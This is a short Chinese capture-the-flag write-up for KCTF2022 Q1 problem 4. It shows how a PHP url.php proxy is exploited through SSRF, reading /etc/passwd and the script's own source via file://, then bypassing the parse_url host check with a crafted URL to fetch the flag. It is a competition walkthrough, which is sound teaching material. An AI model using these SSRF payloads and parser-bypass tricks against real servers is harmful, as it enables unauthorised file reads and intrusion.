-
-
[原创]KCTF2022 Q1 第四题 飞蛾扑火
-
2022-5-16 22:41
-
KCTF2022 Q1 第四题 飞蛾扑火
考点:ssrf & url bypass
1 2 3 4 5 6 7 8 9 10 | <html><head><meta charset="utf-8"><title>欢迎挑战 Design by 香草</title></head><body><!--phpinfo.php--><img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png"></body></html> |
看到phpinfo.php和url.php
想到ssrf
file协议:http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd
能读取到passwd
读取下url.php
1 | curl http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php |
主干
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | $url=$_GET["url"];$uu=parse_url($url);$host=isset($uu["host"])?$uu["host"]:"";$scheme=isset($uu["scheme"])?$uu["scheme"]:"";if(empty($host)){ die("host is null");}if(empty($scheme)){ die("scheme is null");}//https://ctf.pediy.com/upload/team/762/team236762.png?if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag echo curl_request($url,'',"get",[],true,5);}else{die("host not allow");} |
需要绕过parse_url和libcurl
构造url:http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php
得到flag:flag{xxx_999()xx*@eeEEE}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
